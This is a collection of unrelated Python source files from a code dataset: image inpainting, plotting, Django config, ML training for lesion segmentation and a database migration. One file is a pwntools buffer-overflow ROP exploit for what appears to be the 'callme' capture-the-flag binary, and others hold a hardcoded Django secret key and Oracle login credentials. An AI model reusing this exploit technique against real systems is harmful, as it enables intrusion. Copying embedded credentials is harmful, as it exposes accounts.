+{"seq_id":"389479813","text":"import numpy as np\nimport matplotlib.image as img\nimport matplotlib.pyplot as plt\nimport imageio\nimport time as t\n\ns = t.time()\n#Enter sample percentage\nsample_rate = 0.25 #5% sampling if '0.05'\n\n#Enter image adress\nXorig = img.imread('elephants.jpg')\n\nX = Xorig\nny,nx,nz = X.shape\nprint(\"Shape of Image: \",X.shape)\n# Randomly selecting samples\nk = round(nx * ny * sample_rate) # 50% sample\nri = np.random.choice(nx * ny, k, replace=False) # random sample of indices\nprint(\"Number of samples: \",k)\nb = X.T.flat[ri]\nXm = np.zeros(X.shape)\nfor i in range(nz):\n Xm[:,:,i].T.flat[ri] = X[:,:,i].T.flat[ri]\nX1 = np.zeros(X.shape)\nfor i in range(nz):\n X1[:,:,i].T.flat[ri] = X[:,:,i].T.flat[ri]\n\ncondi = True\ncount = 1\nwhile condi:\n X2=np.zeros((ny+2,nx+2,nz))\n for i in range(nz):\n X2[:,:,i] = np.pad(X1[:,:,i], [(1, 1), (1, 1)], mode='constant')\n X3 = X1\n zero_num = (X1 == 0).astype(int)\n if 0 < np.sum(zero_num):\n print('Iteration number: ', count)\n count += 1\n for channel in range(nz):\n for i in range(len(X2[:,0,channel])-2):\n for j in range(len(X2[0,:,channel])-2):\n r = i+1\n c = j+1\n if (X2[r,c,channel] == 0):\n mean = 0\n k = 0\n if (X2[r-1,c-1,channel] != 0):\n mean += X2[r-1,c-1,channel]\n k += 1\n if (X2[r-1,c,channel] != 0):\n mean += X2[r-1,c,channel]\n k += 1\n if (X2[r-1,c+1,channel] != 0):\n mean += X2[r-1,c+1,channel]\n k += 1\n if (X2[r,c-1,channel] != 0):\n mean += X2[r,c-1,channel]\n k += 1\n if (X2[r,c+1,channel] != 0):\n mean += X2[r,c+1,channel]\n k += 1\n if (X2[r+1,c-1,channel] != 0):\n mean += X2[r+1,c-1,channel]\n k += 1\n if (X2[r+1,c,channel] != 0):\n mean += X2[r+1,c,channel]\n k += 1\n if (X2[r+1,c+1,channel] != 0):\n mean += X2[r+1,c+1,channel]\n k += 1\n if (k != 0):\n mean = mean / k\n X1[i,j,channel] = mean\n else:\n condi=False\n\nExecution_time = int(np.round(t.time()-s))\nprint('Execution time: {} sec'.format(Execution_time))\n\nXm[Xm == 0] = 255\nfig, axs = plt.subplots(1, 3,figsize=(15,10))\naxs[0].imshow(X)\n#for jpg file type\naxs[1].imshow((Xm).astype(np.uint8))\naxs[2].imshow((X1).astype(np.uint8))\n#for png type file\n#axs[1].imshow((Xm))\n#axs[2].imshow((X1))\naxs[0].set_title('Orignal')\naxs[1].set_title('{}% sampled.jpg'.format(sample_rate*100))\naxs[2].set_title('Output')\n\nimageio.imwrite('input_image.jpg', X)\nimageio.imwrite('{}%_input.jpg'.format(sample_rate*100), Xm)\nimageio.imwrite('Output.jpg', X1)","sub_path":"source-code/Image_Reconstruction.py","file_name":"Image_Reconstruction.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"460280934","text":"ogrenciler={}\nfor i in range(1,6):\n print(\"\")\n print(\"Öğrenci\",i,\"Bilgileri\")\n print(\"---------------------\")\n adsoyad = str(input(\"Öğrencinin Adı Soyadı: \"))\n asinav = int(input(\"Öğrencinin Ara Sınavı: \"))\n pnotu = int(input(\"Öğrencinin Proje Notu: \"))\n fnotu = int(input(\"Öğrencinin Final Notu: \"))\n gnotu = (asinav * (0.3)) + (pnotu * (0.3)) + (fnotu * (0.4))\n ogrenciler[i] = {\"Ad Soyad\": adsoyad, \"Ara Sınav\": str(asinav),\"Proje Notu\":str(pnotu),\"Final Notu\":str(fnotu),\"Geçme Notu\":str(gnotu)}\nsirali_ogrenciler = sorted(ogrenciler.items(), key=lambda x: float(x[1][\"Geçme Notu\"]),reverse=True)\nprint(sirali_ogrenciler)\n","sub_path":"Homeworks/HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"592510105","text":"import json\nimport pygal.maps.world as pmw\nfrom pygal.style import RotateStyle\nfrom country_codes import get_country_code\n\n# Load the data into a list.\nfilename = 'population_data.json'\n\n# Build a dictionary of population data {\"country code\": population}\ncc_pops = {}\n\nwith open(filename) as f:\n pop_data = json.load(f)\n\n # Print the 2010 population for each country.\n for pop_dict in pop_data:\n if pop_dict['Year'] == '2010':\n country_name = pop_dict['Country Name']\n print(country_name)\n population = int(float(pop_dict['Value']))\n country_code = get_country_code(country_name)\n if country_code:\n cc_pops[country_code] = population\n\ncc_pops1, cc_pops2, cc_pops3 = {}, {}, {}\nfor cc, pop in cc_pops.items():\n if pop < 10000000:\n cc_pops1[cc] = pop\n elif pop < 1000000000:\n cc_pops2[cc] = pop\n else:\n cc_pops3[cc] = pop\n\nwm_style = RotateStyle('#336699')\nwm = pmw.World(style = wm_style)\nwm.title = \"World Populations in 2010\"\nwm.add(\"0-10M\", cc_pops1)\nwm.add(\"10M-1B\", cc_pops2)\nwm.add(\">1B\", cc_pops3)\nwm.render_to_file(\"2010_populations.svg\")","sub_path":"data_visualization/world_population.py","file_name":"world_population.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"434011359","text":"from pwn import *\n\n# use the following command to have the binary listen on localhost:1234\n# socat TCP4-LISTEN:1234,reuseaddr,fork EXEC:./callme\n\ncontext.clear(arch=\"amd64\") # set architecture to amd64, it's needed to generate the ropchain\nLOCATION = \"./callme\" # position of the binary \nbinary = ELF(LOCATION) # create object with data from the binary\nrop = ROP(LOCATION) # create object to help building ropchain\nr = remote(\"localhost\", 1234) # establish connection with the binary\n\ndef overflow(): # function used to find return address offset\n log.info(\"Finding RIP offset...\") \n proc = process(LOCATION, timeout=2) # start local process \n proc.sendline(cyclic(1024, n=8)) # send cyclic pattern \n proc.recvall() # receive data from process\n core = Core(\"core\") # create object from data of the core dump\n offset = cyclic_find(core.pc, n=8) # calculate offset from cyclic pattern\n log.success(\"EIP at offset {0}\".format(offset))\n return 'A' * offset # return as much A's as needed\n\ndef makeRop(): # function used to generate ropchain\n rop.callme_one(1,2,3) # chain call to callme_one with the needed arguments \n rop.callme_two(1,2,3) # as above\n rop.callme_three(1,2,3) # as above\n return str(rop) # return ropchain\n\ndef exploit():\n exp = \"\" # create exploit string\n exp += padding # add A's to overflow until the return address\n exp += makeRop() # overwrite return address with ropchain beginning\n r.recvuntil('>') # receive data from the remote process until the prompt\n r.sendline(exp) # send exploit\n log.success(\"Flag:\" + r.recvall()) # profit\n\npadding = overflow()\nexploit() # start everything\n","sub_path":"callme/64bit/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"648863009","text":"import numpy as np\n\ndropout_rate = 0.2\nexample_output = np.array([0.27, -1.03, 0.67, 0.99, 0.05,\n -0.37, -2.01, 1.13, -0.07, 0.73])\nprint(f'sum initial {sum(example_output)}')\n\nsums = []\nfor i in range(10000):\n\n example_output2 = example_output * \\\n np.random.binomial(1, 1-dropout_rate, example_output.shape) / \\\n (1-dropout_rate)\n sums.append(sum(example_output2))\n\nprint(f'mean sum: {np.mean(sums)}')","sub_path":"ch15_3.py","file_name":"ch15_3.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"433332598","text":"################################################################################\n#\n# LOCAL SETTINGS, MAKE YOUR CHANGES HERE!\n# \n# These settings over-ride those in settings.py\n# This is where you should make all your changes.\n#\n# If you do not have a local_settings.py, copy or rename\n# local_settings.py.template to local_settings.py and follow the instructions.\n#\n# If you would like to change a setting that is not in local_settings.py, copy\n# it from the settings.py file and make ALL changes here, in local_settings.py\n#\n################################################################################\n\n\n# Path to the GeoLite City(required) and Geo Organization(optional) databases\n# from MaxMind. GeoLite City is free for most uses. See license on site.\n# Latest version of GeoLite City can be downloaded from\n# http://dev.maxmind.com/geoip/legacy/geolite\nGEOLITECITY_ABSOLUTE_PATH = \"/export/fedorthurman1/Projects/usage/GeoIP/GeoLiteCity.dat\"\nGEOORGANIZATION_ABSOLUTE_PATH = \"/export/fedorthurman1/Projects/usage/GeoIP/GeoOrganization.dat\"\n\n# use DEBUG = False in production!\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n #('example', 'example@example.com'),\n)\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',# Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': '/export/fedorthurman1/Projects/usage/usage.db', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n# Make this unique, and don't share it with anybody.\n# The default one is 62 characters long and looks something like this:\n# SECRET_KEY = '7u&*d3di%e*7fuu$^-eeteu(mk_e+usb3$g7jv9a%&!&#eyt#-'\n#\n# You can generate a new one on the command line like so:\n# python -c 'import random; print \"\".join([random.choice(\"abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)\") for i in range(62)])'\nSECRET_KEY = '7u&*d3di%e*7fuu$^-eeteu(mk_e+usb3$g7jv9a%&!&#eyt#-'\n\n# A list of strings representing the host/domain names that this Django site can serve.\n# This is a security measure to prevent an attacker from poisoning caches and password\n# reset emails with links to malicious hosts by submitting requests with a fake HTTP Host\n# header, which is possible even under many seemingly-safe webserver configurations.\nALLOWED_HOSTS = ['uvcdat.llnl.gov', '127.0.0.1', 'localhost']\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'America/Los_Angeles'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/media/\"\nMEDIA_ROOT = '/var/www/emily.llnl.gov/usage/media/'\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = 'http://localhost:8080/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# To deploy, run `python manage.py collectstatic`\n#\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = '/var/www/emily.llnl.gov/usage/static/'\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = 'http://127.0.0.1/static/'\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'console':{\n 'level': 'ERROR',\n 'class': 'logging.StreamHandler',\n 'filters': ['require_debug_false'],\n 'formatter': 'verbose'\n },\n 'file':{\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': 'debug.log',\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins', 'console'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","sub_path":"usage/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"427965752","text":"from django.conf.urls import url\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\napp_name = 'accounts'\n\nurlpatterns = [\n url(r'^login/', auth_views.LoginView.as_view(template_name=\"accounts/login.html\"), name='login'),\n url(r'^logout/', auth_views.LogoutView.as_view(), name='logout'),\n url(r'^signup/', views.SignUpView.as_view(), name='signup'),\n url(r'^profile/$', views.profileinfoview, name='user_profile'),\n url(r'^profile_edit/$', views.editprofileview, name='edit_profile'),\n url(r'^add_friend/(?P\\d+)/', views.add_friend_view, name='add_friend'),\n url(r'^my_friends/$', views.get_friends_list, name='my_friends'),\n]\n","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"610455476","text":"'''\r\nCreated on Mar 14, 2017\r\n\r\n@author: kautilya.save\r\n'''\r\nimport cx_Oracle\r\ncon = cx_Oracle.Connection('t753423/t753423@10.123.79.57/georli02')\r\ncur = cx_Oracle.Cursor(con)\r\ncur.execute(\"SELECT * FROM Computer\")\r\nlist1 = []\r\n# for v in list1 :\r\n# print(v)\r\nfor row in cur:\r\n list1.append(row)\r\n print(row)\r\n \r\nprint(list1)\r\nprint(cur.rowcount)\r\ncur.close()\r\n# con.commit()\r\ncon.close()","sub_path":"python/PF/DBMSCon/Connection/wherequery.py","file_name":"wherequery.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"489190685","text":"import numpy as np\nimport matplotlib as mpl\nmpl.use('agg')\nmpl.rcParams['axes.grid'] = False\nmpl.rcParams['figure.figsize'] = (12, 12)\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport tensorflow as tf\nfrom tensorflow.python.keras import models\nimport time\nfrom unet import unet, bce_dice_loss, dice_loss, dice_coeff\nfrom data import prepare_train_val, prepare_test\nfrom tensorflow.python.keras import backend as K\nimport rgb_lab_formulation as Conv_img\nimport utils\nimport gc\nimport os\n# Train your model\n\n# cspace = \"RGB\" or \"HSV\" or \"HSV-RGB\" or \"LAB\"\ndef callback_def(epochs, cspace, type_train='', it=0, lr=0.001, batch_size=8):\n if(not os.path.exists('models/' + type_train + '/' + cspace + '/')):\n os.makedirs('models/' + type_train + '/' + cspace + '/')\n save_model_path = 'models/' + type_train + '/' + cspace + '/weights' + str(epochs) + '_' + str(it) + '_' + str(lr) + '_' + str(batch_size) + '.hdf5'\n save_log_path = 'models/' + type_train + '/' + cspace + '/log' + str(epochs) + '_' + str(it) + '_' + str(lr) + '_' + str(batch_size) + '_' + str(int(time.time()))\n cp = [tf.keras.callbacks.ModelCheckpoint(\n filepath=save_model_path,\n monitor='val_dice_loss',\n save_best_only=True,\n verbose=1),\n tf.keras.callbacks.TensorBoard(\n log_dir=save_log_path\n )]\n return cp, save_model_path\n\n# cspace = \"RGB\" or \"HSV\" or \"HSV-RGB\" or \"LAB\"\ndef train_history(epochs, cspace, history, type_train='', it=0):\n dice = history.history['dice_loss']\n val_dice = history.history['val_dice_loss']\n\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs_range = range(epochs)\n\n fig = plt.figure(figsize=(16, 8))\n plt.subplot(1, 2, 1)\n plt.plot(epochs_range, dice, label='Training Dice Loss')\n plt.plot(epochs_range, val_dice, label='Validation Dice Loss')\n plt.legend(loc='upper right')\n plt.title('Training and Validation Dice Loss')\n\n plt.subplot(1, 2, 2)\n plt.plot(epochs_range, loss, label='Training Loss')\n plt.plot(epochs_range, val_loss, label='Validation Loss')\n plt.legend(loc='upper right')\n plt.title('Training and Validation Loss')\n\n fig.savefig('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/loss.png', bbox_inches='tight')\n\n# x_in and y_in are numpy arrays\ndef fjaccard(x_in, y_in):\n x = x_in.flatten()\n y = y_in.flatten()\n return np.sum(np.logical_and(x, y).astype(float)) / np.sum(\n np.logical_or(x, y).astype(float))\n\ndef evaluate_test(model, test_ds, num_test_examples, cspace, epochs, save_model_path=None, type_train='',write_images=True, it=0):\n if (save_model_path != None):\n model = models.load_model(\n save_model_path,\n custom_objects={\n 'bce_dice_loss': bce_dice_loss,\n 'dice_loss': dice_loss\n })\n # Let's visualize some of the outputs\n mjccard = 0\n score = 0\n v_jaccard = np.zeros(num_test_examples)\n v_sensitivity = np.zeros(num_test_examples)\n v_specificity = np.zeros(num_test_examples)\n v_accuracy = np.zeros(num_test_examples)\n v_dice = np.zeros(num_test_examples)\n\n crf_jaccard = np.zeros(num_test_examples)\n crf_sensitivity = np.zeros(num_test_examples)\n crf_specificity = np.zeros(num_test_examples)\n crf_accuracy = np.zeros(num_test_examples)\n crf_dice = np.zeros(num_test_examples)\n\n data_aug_iter = test_ds.make_one_shot_iterator()\n next_element = data_aug_iter.get_next()\n if(not os.path.exists('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/')):\n os.makedirs('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/')\n for j in range(num_test_examples):\n # Running next element in our graph will produce a batch of images\n batch_of_imgs, label = tf.keras.backend.get_session().run(next_element)\n img = batch_of_imgs[0]\n\n predicted_label = model.predict(batch_of_imgs)[0]\n mpimg.imsave('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/' + str(j) + '.png', predicted_label[:,:,0])\n mask_pred = (predicted_label[:, :, 0] > 0.55).astype(int)\n label = label.astype(int)\n\n v_jaccard[j] = fjaccard(label[0, :, :, 0], mask_pred)\n v_sensitivity[j] = utils.sensitivity(label[0,:,:,0], mask_pred)\n v_specificity[j] = utils.specificity(label[0,:,:,0], mask_pred)\n v_accuracy[j] = utils.accuracy(label[0,:,:,0], mask_pred)\n v_dice[j] = utils.dice_coeff(label[0,:,:,0], mask_pred)\n score += v_jaccard[j] if v_jaccard[j] >= 0.65 else 0\n print(score)\n mjccard += v_jaccard[j]\n\n img_rgb = img[:, :, :3]\n\n if(cspace == 'HSV'):\n img_rgb = tf.keras.backend.get_session().run(tf.image.hsv_to_rgb(img_rgb))\n elif(cspace == 'LAB'):\n img_rgb = tf.keras.backend.get_session().run(Conv_img.lab_to_rgb(img_rgb))\n\n crf_mask = utils.dense_crf(np.array(img_rgb*255).astype(np.uint8), np.array(predicted_label[:, :, 0]).astype(np.float32))\n\n crf_jaccard[j] = fjaccard(label[0, :, :, 0], crf_mask)\n crf_sensitivity[j] = utils.sensitivity(label[0,:,:,0], crf_mask)\n crf_specificity[j] = utils.specificity(label[0,:,:,0], crf_mask)\n crf_accuracy[j] = utils.accuracy(label[0,:,:,0], crf_mask)\n crf_dice[j] = utils.dice_coeff(label[0,:,:,0], crf_mask)\n\n if(write_images):\n fig = plt.figure(figsize=(25, 25))\n\n plt.subplot(1, 4, 1)\n plt.imshow(img[:, :, :3])\n plt.title(\"Input image\")\n \n plt.subplot(1, 4, 2)\n plt.imshow(label[0, :, :, 0])\n plt.title(\"Actual Mask\")\n \n plt.subplot(1, 4, 3)\n plt.imshow(predicted_label[:, :, 0] > 0.55)\n plt.title(\"Predicted Mask\\n\" +\n \"Jaccard = \" + str(v_jaccard[j]) +\n '\\nSensitivity = ' + str(v_sensitivity[j]) +\n '\\nSpecificity = ' + str(v_specificity[j]) +\n '\\nAccuracy = ' + str(v_accuracy[j]) +\n '\\nDice = ' + str(v_dice[j]))\n \n plt.subplot(1, 4, 4)\n plt.imshow(crf_mask)\n plt.title(\"CRF Mask\\n\" +\n \"Jaccard = \" + str(crf_jaccard[j]) +\n '\\nSensitivity = ' + str(crf_sensitivity[j]) +\n '\\nSpecificity = ' + str(crf_specificity[j]) +\n '\\nAccuracy = ' + str(crf_accuracy[j]) +\n '\\nDice = ' + str(crf_dice[j]))\n \n fig.savefig(\n 'pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/' + str(j) + '.png',\n bbox_inches='tight')\n plt.close(fig)\n mpimg.imsave('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/predict/' + str(j) + '.png', predicted_label[:,:,0])\n plt.close()\n\n mjccard /= num_test_examples\n score /= num_test_examples\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/jaccard', v_jaccard)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/sensitivity', v_sensitivity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/specificity', v_specificity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/accuracy', v_accuracy)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/dice', v_dice)\n with open('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/score','w') as f:\n f.write('Score = ' + str(score) +\n '\\nSensitivity = ' + str(np.mean(v_sensitivity)) +\n '\\nSpecificity = ' + str(np.mean(v_specificity)) +\n '\\nAccuracy = ' + str(np.mean(v_accuracy)) +\n '\\nDice = ' + str(np.mean(v_dice)) +\n '\\nJaccars = ' + str(np.mean(v_jaccard)))\n\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_jaccard', crf_jaccard)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_sensitivity', crf_sensitivity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_crf_specificity', crf_specificity)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_accuracy', crf_accuracy)\n np.savetxt('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_dice', crf_dice)\n with open('pos_results/' + type_train + cspace + '/' + str(epochs) + '/' + str(it) + '/crf_score','w') as f:\n f.write('Sensitivity = ' + str(np.mean(crf_sensitivity)) +\n '\\nSpecificity = ' + str(np.mean(crf_specificity)) +\n '\\nAccuracy = ' + str(np.mean(crf_accuracy)) +\n '\\nDice = ' + str(np.mean(crf_dice)) +\n '\\nJaccars = ' + str(np.mean(crf_jaccard)))\n\n print('Jccard = ' + str(mjccard))\n print('Score = ' + str(score))\n return mjccard, score\n\nif __name__ == '__main__':\n epochs = 80\n #cspacev = [\"RGB\",\"HSV\",\"LAB\",\"RGB-HSV\",\"RGB-HSV-L\",\"RGB-HSV-LAB\",\"RGB-SV-LAB\"]\n #img_shapev = [3,3,3,6, 7, 9, 8]\n cspacev = [\"RGB\"]\n img_shapev = [3]\n img_shape = (256, 256, 3)\n type_train = 'fine_tune'\n batch_size = 8\n lr = 0.00001\n i = 0\n for cspace, img_dim in zip(cspacev, img_shapev):\n inic = 0\n fim = 10\n for it in [0,3,4,5,6,7]:\n with tf.Graph().as_default():\n with tf.Session().as_default():\n # Adjust image shape\n imagelst = list(img_shape)\n imagelst[2] = img_dim\n img_shape = tuple(imagelst)\n \n print(\"Loading dataset...\\n\")\n \n if(type_train == \"direct_transfer\"):\n dataset = 'ISIC_TEST'\n else:\n dataset = 'PAD'\n train_ds, val_ds, num_train_examples, num_val_examples = prepare_train_val(\n dataset=dataset,\n cspace=cspace,\n img_shape=img_shape,\n batch_size=batch_size)\n pad_test_ds, pad_num_test_examples = prepare_test(\n dataset='PAD',\n cspace=cspace,\n img_shape=img_shape)\n \n print(\"Done. Iteration = \" + str(it) + \"\\n\")\n # Load Model\n i = i + 1\n if(type_train == \"fine_tune\" or type_train == 'ISIC/fine_tune'):\n model = models.load_model(\n 'models/' + 'direct_transfer' + '/' + cspace + '/weights' + str(epochs) + '_' + str(it) + '_' + '0.0001' + '_' + str(batch_size) + '.hdf5',\n custom_objects={\n 'bce_dice_loss': bce_dice_loss,\n 'dice_loss': dice_loss\n })\n else:\n model = unet(img_shape, lr=lr)\n start_time = time.time()\n cp, save_model_path = callback_def(\n epochs, cspace,\n type_train=type_train, it=it, lr=lr, batch_size=batch_size)\n \n \n # Train Model\n history = model.fit(\n train_ds,\n steps_per_epoch=int(np.ceil(num_train_examples / float(batch_size))),\n epochs=epochs,\n validation_data=val_ds,\n validation_steps=int(np.ceil(num_val_examples / float(batch_size))),\n callbacks=cp)\n \n # Save Results\n if(not os.path.exists('pos_results/' + type_train + '/' + cspace + '/' + str(epochs) + '/' + str(it))):\n os.makedirs('pos_results/' + type_train + '/' + cspace + '/' + str(epochs) + '/' + str(it))\n with open('pos_results/' + type_train + '/' + cspace + '/' + str(epochs) + '/' + str(it) + '/time','w') as f:\n f.write(str(time.time() - start_time))\n train_history(\n epochs,\n cspace,\n history,\n type_train= type_train + '/',\n it=it)\n \n # Test Model\n evaluate_test(\n model,\n pad_test_ds,\n pad_num_test_examples,\n cspace,\n epochs,\n type_train= type_train + '/',\n write_images=False,\n it=it,\n save_model_path='models/' + type_train + '/' + cspace + '/weights' + str(epochs) + '_' + str(it) + '_' + str(lr) + '_' + str(batch_size) + '.hdf5',)\n # evaluate_test(model, isictest_test_ds, isictest_num_test_examples, cspace, epochs,\n # save_model_path='models/' + cspace + '/weights' + str(epochs) + '.hdf5',\n # ISIC='/ISICTEST')\n # evaluate_test(model, isic_test_ds, isic_num_test_examples, cspace, epochs,\n # save_model_path='models/' + cspace + '/weights' + str(epochs) + '.hdf5',\n # ISIC='/ISIC')\n K.clear_session()\n del model, pad_test_ds\n # del model, train_ds, val_ds,pad_test_ds\n gc.collect()","sub_path":"pgmain.py","file_name":"pgmain.py","file_ext":"py","file_size_in_byte":14107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"642512134","text":"\"\"\"changes to pitch class\n\nRevision ID: 1eb964d9a352\nRevises: ae07c174daea\nCreate Date: 2018-06-26 08:42:49.423848\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1eb964d9a352'\ndown_revision = 'ae07c174daea'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('pitches', sa.Column('author', sa.Integer(), nullable=True))\n op.add_column('pitches', sa.Column('category', sa.String(), nullable=True))\n op.add_column('pitches', sa.Column('content', sa.String(), nullable=True))\n op.add_column('pitches', sa.Column('title', sa.String(), nullable=True))\n op.drop_constraint('pitches_user_id_fkey', 'pitches', type_='foreignkey')\n op.create_foreign_key(None, 'pitches', 'users', ['author'], ['id'])\n op.drop_column('pitches', 'pitch_desc')\n op.drop_column('pitches', 'user_id')\n op.drop_column('pitches', 'pitch_category')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('pitches', sa.Column('pitch_category', sa.VARCHAR(), autoincrement=False, nullable=True))\n op.add_column('pitches', sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.add_column('pitches', sa.Column('pitch_desc', sa.VARCHAR(), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'pitches', type_='foreignkey')\n op.create_foreign_key('pitches_user_id_fkey', 'pitches', 'users', ['user_id'], ['id'])\n op.drop_column('pitches', 'title')\n op.drop_column('pitches', 'content')\n op.drop_column('pitches', 'category')\n op.drop_column('pitches', 'author')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/1eb964d9a352_changes_to_pitch_class.py","file_name":"1eb964d9a352_changes_to_pitch_class.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"528481938","text":"# Esta funcin clcula la velocidad tangencial promedio en un intervalo de radio determinado. \n\n# input : \n# -- x: posicin en la direccin x\n# -- y: posicin en la direccin y\n# -- vx: velocidad en la direccin x\n# -- vy: velocidad en la direccin y\n\n# output: \n# -- vcir: velocidad promedio tangente al vector posicin en un radio determinado\n\nimport numpy as np \n\ndef Vcir(x,y,vx,vy):\n ux = (y/np.sqrt(x**2 + y**2)) # vector unitario x \n uy = (-x/np.sqrt(x**2 + y**2)) # vector unitario y\n pp = ux*vx + uy*vy # producto punto \n vcir = np.abs(np.sum((pp))/np.shape(vx)[0]) # velocidad tangencial \n return(vcir)\n","sub_path":"Vcir.py","file_name":"Vcir.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
